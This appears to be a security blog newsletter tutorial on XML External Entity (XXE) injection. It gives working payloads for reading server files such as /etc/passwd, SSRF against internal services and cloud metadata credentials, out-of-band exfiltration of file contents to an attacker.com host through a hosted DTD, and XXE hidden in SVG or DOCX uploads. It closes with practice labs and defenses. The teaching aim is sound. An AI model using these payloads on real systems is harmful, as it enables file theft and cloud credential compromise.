XXE Injection: When XML Parsers Become Your Worst Enemy

10 min read

November 2, 2025

🚧 Site Migration Notice

I've recently migrated this site from Ghost CMS to a new Astro-based frontend. While I've worked hard to ensure everything transferred correctly, some articles may contain formatting errors or broken elements.

If you spot any issues, I'd really appreciate it if you could let me know! Your feedback helps improve the site for everyone.

XXE Injection: When XML Parsers Become Your Worst Enemy

Table of contents

Contents

Hey everyone,

A few weeks ago, a colleague was testing an internal API and stumbled on an XXE vulnerability. The thing is, it was blind. No direct output, no error messages, nothing. We knew the parser was processing our entities, but we couldn’t figure out how to exfiltrate the data properly. We tried a few OOB techniques, but honestly, we didn’t nail the exploitation.

That stuck with me. I hate leaving vulnerabilities half-exploited. So I spent some time digging deeper into blind XXE, out-of-band exfiltration, and all the edge cases we probably missed.

The thing about XXE is that it’s one of those vulnerabilities that feels almost too easy when you find it. But when you don’t know what to look for, you’ll walk right past it. And that’s exactly why it keeps showing up in penetration tests, bug bounty reports, and CVEs year after year.

So let’s fix that. This newsletter breaks down XML External Entity (XXE) injection: what it is, how it works, and how to exploit it from basic file disclosure to blind out-of-band exfiltration.

What XXE Actually Is

XXE is a vulnerability that lets you abuse how XML parsers process external entities. When an application parses XML without properly configuring its parser, you can inject malicious entity declarations that force the server to:

  • Read arbitrary files from the filesystem
  • Make HTTP requests to internal systems (SSRF)
  • Perform denial of service attacks
  • In rare cases, achieve remote code execution

The root cause is simple: the XML 1.0 specification allows entities (basically variables in XML) to reference external resources. If the parser follows those references and the input isn’t sanitized, attackers control what gets loaded.

Here’s the basic structure of an XXE payload:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the parser processes this, it reads /etc/passwd and injects its contents where &xxe; appears. If that data shows up in the application’s response, you’ve got file disclosure.

Why This Still Matters in 2025

You’d think this would be fixed by now, right? It’s been on the OWASP Top 10 since 2017. But XXE vulnerabilities keep showing up.

Recent examples:

  • CVE-2024-34102 (CosmicSting) – A critical unauthenticated XXE in Adobe Commerce and Magento that could lead to remote code execution. Affected versions before 2.4.7-p1. CVSS score: 9.8/10.

  • CVE-2024-30043 – XXE in Microsoft SharePoint Server allowing file read with Farm Service account permissions and SSRF attacks. Patched in May 2024.

  • CVE-2023-42344 – Unauthenticated XXE in OpenCMS (versions 9.0.0 to 10.5.0) allowing remote code execution without authentication.

These aren’t small apps. These are enterprise platforms with millions of users. The problem? Legacy code, third-party libraries with insecure defaults, and developers who don’t realize their XML parser is dangerous out of the box.

Finding XXE Vulnerabilities

Not every endpoint that accepts XML is vulnerable. Modern frameworks often disable external entities by default. But you’d be surprised how many don’t.

Where to Look

Check any functionality that processes XML:

  • File uploads (especially DOCX, XLSX, SVG, or other XML-based formats)
  • API endpoints that accept Content-Type: application/xml
  • SOAP services
  • RSS/Atom feed parsers
  • SAML authentication flows
  • Configuration file uploads

Testing for XXE

Start with a basic probe. Send this payload and see if the parser even processes entities:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY test "HelloXXE">
]>
<root>
  <data>&test;</data>
</root>

If the response includes “HelloXXE” where you referenced &test;, the parser is processing entities. Now you can escalate.

Basic File Disclosure

The classic XXE attack: read files from the server’s filesystem.

Payload to read /etc/passwd:
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <username>&xxe;</username>
</root>

If the application reflects the <username> value in its response, you’ll see the contents of /etc/passwd.

Common files to target:

  • /etc/passwd – User accounts (Linux/Unix)
  • /etc/hosts – Network configuration
  • C:\Windows\System32\drivers\etc\hosts – Windows hosts file
  • /proc/self/environ – Environment variables (might leak secrets)
  • Application config files (e.g., /var/www/html/config.php)
  • Cloud metadata endpoints (more on this in a sec)

One thing to watch out for: some files contain characters that break XML parsing (like < or &). We’ll handle that with Base64 encoding in the blind XXE section.

XXE to SSRF

This is where XXE gets really interesting. Instead of reading local files, you can make the server send HTTP requests to internal systems.

Example payload:
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<root>
  <data>&xxe;</data>
</root>

The server makes an HTTP request to http://internal-service:8080/admin and includes the response in its output. This bypasses firewalls and gives you access to internal APIs, admin panels, or cloud metadata endpoints.

Cloud metadata exploitation:

If you’re testing an app running on AWS, try this:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

This hits the AWS metadata service and can leak IAM credentials with full access to the cloud account. Same concept works for Azure (http://169.254.169.254/metadata/instance?api-version=2021-02-01) and GCP.

Combined with my SSRF newsletter from Issue 4, you can chain XXE into full internal network access.

Blind XXE: When You Don’t See Output

Sometimes the application doesn’t reflect the XML data in its response. The parser processes your payload, but you don’t see the result. That’s blind XXE.

Out-of-Band (OOB) Exfiltration

The trick here is to make the server send the data to a system you control. You need two things:

  1. A server you control to receive the data (use Burp Collaborator, your own VPS, or webhook.site)
  2. A payload that references an external DTD hosted on your server

Step 1: Host a malicious DTD on your server (http://attacker.com/evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Step 2: Send this payload to the target:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root></root>

Here’s what happens:

  1. The parser loads your external DTD
  2. The DTD defines a parameter entity that reads /etc/passwd
  3. It defines another entity that makes an HTTP request to your server, embedding the file contents in the URL
  4. Your server receives the request with the file data in the query string

Pro tip: If the file contains special characters that break URLs, wrap it in Base64:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

Then Base64-decode the exfiltrated data on your end.

Error-Based Blind XXE

If OOB doesn’t work (firewalls, no egress, etc.), you can sometimes leak data through error messages. This technique also typically requires an external DTD.

Malicious DTD hosted on your server (http://attacker.com/error.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Payload sent to target:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
  %dtd;
]>
<root></root>

The parser tries to access a file at /nonexistent/[contents of /etc/passwd], fails, and includes the file path (with embedded file contents) in the error message.

Note: Because of XML specification restrictions on using parameter entities within internal DTDs, this technique requires either an external DTD or repurposing an existing local DTD file on the server.

XXE in Unexpected Places

Don’t just test plain XML endpoints. XXE hides in formats you wouldn’t expect.

File Uploads

SVG images are XML-based. If an app lets you upload profile pictures and processes SVG files, try embedding an XXE payload:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

Upload it, and if the app displays or processes the SVG server-side, you might trigger XXE.

DOCX and XLSX files are ZIP archives containing XML. Extract one, modify the XML inside (e.g., word/document.xml), inject your payload, rezip it, and upload. I’ve seen this work in document preview features and automated processing systems.

XInclude Attacks

Sometimes you don’t control the entire XML document, just a single value inside it. Standard XXE won’t work because you can’t define a DOCTYPE. That’s where XInclude comes in.

If you control a value in the XML, try this:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

XInclude lets you include external files directly in XML elements, bypassing the need for entity declarations.

Content-Type Switching

Some apps accept Content-Type: application/json but also parse application/xml if you send it. Try switching your POST request from JSON to XML and see if the endpoint still processes it.

From this:
POST /api/user HTTP/1.1
Content-Type: application/json

{"username": "test"}
To this:
POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><username>&xxe;</username></root>

If the backend uses a library that auto-detects content types or falls back to XML parsing, you might trigger XXE on an endpoint that wasn’t designed to accept XML.

Tools You Need

Burp Suite – Essential for intercepting and modifying requests. Burp Collaborator is perfect for OOB testing.

XXEinjector – Automates XXE exploitation including OOB exfiltration and enumeration. Supports direct and out-of-band methods (FTP, HTTP, Gopher). https://github.com/enjoiz/XXEinjector

DTD Finder – Lists DTDs and generates XXE payloads using local DTD files. Useful for blind XXE exploitation. https://github.com/GoSecure/dtd-finder

PayloadsAllTheThings (XXE Section) – Comprehensive payload collection with classic XXE, OOB, and various exploitation techniques. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

Where to Practice

PortSwigger Web Security Academy – Multiple XXE labs with increasing difficulty. All labs are free:

Main XXE page: https://portswigger.net/web-security/xxe

TryHackMe – XXE Injection Room – Premium room covering in-band, out-of-band, and expansion XXE attacks. Includes exercises chaining XXE with SSRF. https://tryhackme.com/room/xxeinjection

Hack The Box – BountyHunter – Easy-rated Linux machine featuring XXE exploitation to read PHP source files and dump database credentials. Good introduction to practical XXE in a realistic scenario. https://app.hackthebox.com/machines/BountyHunter

Defense and Detection

If you’re defending against XXE, here’s what actually works:

Disable External Entities – The nuclear option. Most XML libraries have config flags to disable DTD processing entirely. Use them.

// Java example
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Use Simple Data Formats – If you don’t need XML’s complexity, use JSON. Fewer features = smaller attack surface.

Input Validation – Reject any XML containing DOCTYPE, ENTITY, or SYSTEM keywords. Not foolproof, but catches lazy attacks.

Least Privilege – Run your XML parser with minimal file system access. If it can’t read /etc/passwd, XXE becomes much less useful.

Monitor Outbound Traffic – Blind XXE relies on exfiltration. Alert on unexpected HTTP requests from your backend to external IPs.

Wrapping Up

XXE is one of those vulnerabilities that seems straightforward on paper but has a surprising amount of depth. Basic file disclosure is the entry point, but once you understand OOB exfiltration, SSRF chaining, and hunting XXE in unexpected formats like SVG or DOCX, you unlock a whole new class of attack vectors.

The reason XXE keeps appearing in CVEs is that it’s easy to miss. An app might not directly accept XML, but a third-party library processing uploaded files might. Or an API endpoint designed for JSON might fall back to XML parsing. Or a developer might enable XML features “just in case” and never disable them.

So next time you’re testing an app, grep for XML. Check file uploads. Try content-type switching. You might be surprised what you find.

Coming This Week

This week, probably on Wednesday, I’ll be publishing a new article in the Web3 series: an introduction to how signatures work in Ethereum. We’ll cover the fundamentals of digital signatures, how Ethereum implements them, and why they’re critical for smart contract and wallet security. It’s the perfect starting point before diving into replay attacks and other signature-based exploitation techniques.

Thanks for reading, and happy hunting.

Ruben

Chapters

NTLM Relay: Why Authentication in AD is Still Broken
NTLM Relay: Why Authentication in AD is Still Broken

Previous Issue

Enjoyed the article?

Stay Updated & Support

Get the latest offensive security insights, hacking techniques, and cybersecurity content delivered straight to your inbox.

Follow me on social media